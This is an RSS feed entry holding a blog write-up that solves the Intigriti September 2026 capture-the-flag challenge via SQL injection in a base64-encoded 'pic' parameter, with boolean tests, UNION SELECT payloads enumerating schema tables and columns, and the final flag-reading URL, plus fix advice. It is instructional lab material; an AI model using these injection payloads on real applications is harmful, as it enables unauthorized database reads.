<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Samiksha Shreya</title>
    <description>The latest articles on DEV Community by Samiksha Shreya (@samikshashreya).</description>
    <link>https://dev.to/samikshashreya</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4152816%2F5cdfe86b-378e-44ad-a446-8698908ececf.jpg</url>
      <title>DEV Community: Samiksha Shreya</title>
      <link>https://dev.to/samikshashreya</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/samikshashreya"/>
    <language>en</language>
    <item>
      <title>Solving the Intigriti September 2026 Critter Gallery challenge</title>
      <dc:creator>Samiksha Shreya</dc:creator>
      <pubDate>Wed, 30 Sep 2026 17:35:25 +0000</pubDate>
      <link>https://dev.to/samikshashreya/solving-the-intigriti-september-2026-critter-gallery-challenge-37j5</link>
      <guid>https://dev.to/samikshashreya/solving-the-intigriti-september-2026-critter-gallery-challenge-37j5</guid>
      <description>&lt;p&gt;I found the flag by following the gallery's &lt;code&gt;pic&lt;/code&gt; parameter from an ordinary animal page into a SQL query. The value looked opaque in the URL, but it was only base64 encoded. Once decoded, the animal name could change the database predicate and supply a result from another table.&lt;/p&gt;

&lt;p&gt;This writeup covers only the official challenge at &lt;a href="https://challenge-0926.challenges.intigriti.io/challenge.php" rel="noopener noreferrer"&gt;https://challenge-0926.challenges.intigriti.io/challenge.php&lt;/a&gt;. The solve was accepted in submission &lt;code&gt;INTIGRITI-T8Z07V6I&lt;/code&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Start with one animal
&lt;/h2&gt;

&lt;p&gt;A gallery entry opened at this URL:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://challenge-0926.challenges.intigriti.io/challenge.php?pic=Zm94
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;Zm94&lt;/code&gt; decodes to &lt;code&gt;fox&lt;/code&gt;. The page showed one description:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;The red fox is a clever, highly adaptable hunter.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That gave me a small input to vary. I kept the path fixed and changed only &lt;code&gt;pic&lt;/code&gt;, encoding each candidate as base64 before sending it. For example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;printf&lt;/span&gt; %s &lt;span class="s1"&gt;'fox'&lt;/span&gt; | &lt;span class="nb"&gt;base64&lt;/span&gt; &lt;span class="nt"&gt;-w0&lt;/span&gt;
&lt;span class="c"&gt;# Zm94&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The encoding does not make the input safe. The relevant question was what the application did with the decoded text.&lt;/p&gt;

&lt;h2&gt;
  
  
  Check whether the decoded value changes the query
&lt;/h2&gt;

&lt;p&gt;A decoded &lt;code&gt;fox'&lt;/code&gt; produced an empty response. That suggested a quote might have disrupted a query, but an empty response alone could have many causes. I compared a true condition with a false one instead.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Decoded &lt;code&gt;pic&lt;/code&gt; value&lt;/th&gt;
&lt;th&gt;Base64 value&lt;/th&gt;
&lt;th&gt;Observed result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;fox' OR '1'='1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Zm94JyBPUiAnMSc9JzE=&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Descriptions for all eight animals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;fox' AND '1'='2&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Zm94JyBBTkQgJzEnPScy&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No fox row&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The true condition expanded a single animal result into all eight descriptions. The false condition removed the fox result. That pair is the useful evidence: it shows the decoded input controls the database predicate, rather than merely changing how an animal name is displayed.&lt;/p&gt;

&lt;h2&gt;
  
  
  Find the shape of the result
&lt;/h2&gt;

&lt;p&gt;I next tested whether the page would display a value supplied through &lt;code&gt;UNION SELECT&lt;/code&gt;. The following decoded input worked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;fox&lt;/span&gt;&lt;span class="s1"&gt;' UNION SELECT database()-- -
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The page showed &lt;code&gt;critter_gallery&lt;/code&gt; alongside the fox description. A union with two selected columns returned an empty body, while one selected column worked. This indicated that the visible query result has one column. A separate &lt;code&gt;version()&lt;/code&gt; probe returned &lt;code&gt;8.0.46&lt;/code&gt;, consistent with the MySQL behavior used in the subsequent queries.&lt;/p&gt;

&lt;p&gt;To enumerate the tables in only the current challenge database, I used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;fox&lt;/span&gt;&lt;span class="s1"&gt;' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()-- -
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The page displayed &lt;code&gt;animals&lt;/code&gt; and &lt;code&gt;secret_vault&lt;/code&gt;. I then asked for the columns of that specific table:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;fox&lt;/span&gt;&lt;span class="s1"&gt;' UNION SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='&lt;/span&gt;&lt;span class="n"&gt;secret_vault&lt;/span&gt;&lt;span class="s1"&gt;'-- -
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The visible columns were &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;note&lt;/code&gt;. The flag was likely in &lt;code&gt;note&lt;/code&gt;, so I queried that column without changing or deleting data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Read the flag
&lt;/h2&gt;

&lt;p&gt;The final decoded value was:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="n"&gt;fox&lt;/span&gt;&lt;span class="s1"&gt;' UNION SELECT note FROM secret_vault-- -
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Its base64 form is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Zm94JyBVTklPTiBTRUxFQ1Qgbm90ZSBGUk9NIHNlY3JldF92YXVsdC0tIC0=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The exact reproduction URL is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://challenge-0926.challenges.intigriti.io/challenge.php?pic=Zm94JyBVTklPTiBTRUxFQ1Qgbm90ZSBGUk9NIHNlY3JldF92YXVsdC0tIC0=
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The response contained:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;INTIGRITI{01a09f56-74a2-700b-a849-ffe6742327b2}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I reopened that final URL and confirmed the same flag. This was a read from the challenge database only.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this works
&lt;/h2&gt;

&lt;p&gt;The observations are consistent with an application that decodes &lt;code&gt;pic&lt;/code&gt; and places the resulting animal name into a SQL lookup without binding it as data. The first quote changes the meaning of the lookup. &lt;code&gt;OR '1'='1&lt;/code&gt; makes the condition true for every animal, while &lt;code&gt;UNION SELECT&lt;/code&gt; adds a result from another table to the one column the page already renders. The trailing SQL comment neutralizes the remainder of the original expression.&lt;/p&gt;

&lt;p&gt;Base64 is an encoding layer, not a defense against SQL injection. A real application should bind the decoded value through a prepared statement, validate it against the allowed animal identifiers, and give its database account only the table access it needs. I did not see the server source code, so the exact query construction is an inference from the behavior, not a source code claim.&lt;/p&gt;

&lt;h2&gt;
  
  
  Evidence views
&lt;/h2&gt;

&lt;p&gt;The baseline fox page showed one animal description. The true condition page showed all eight animal descriptions. The final union page showed the flag alongside the ordinary fox result. Those three views capture the change from expected lookup to predicate control to reading a separate challenge table.&lt;/p&gt;

&lt;p&gt;Challenge rules: &lt;a href="https://app.intigriti.com/programs/intigriti/challenge0926/detail" rel="noopener noreferrer"&gt;https://app.intigriti.com/programs/intigriti/challenge0926/detail&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
      <category>sql</category>
    </item>
  </channel>
</rss>
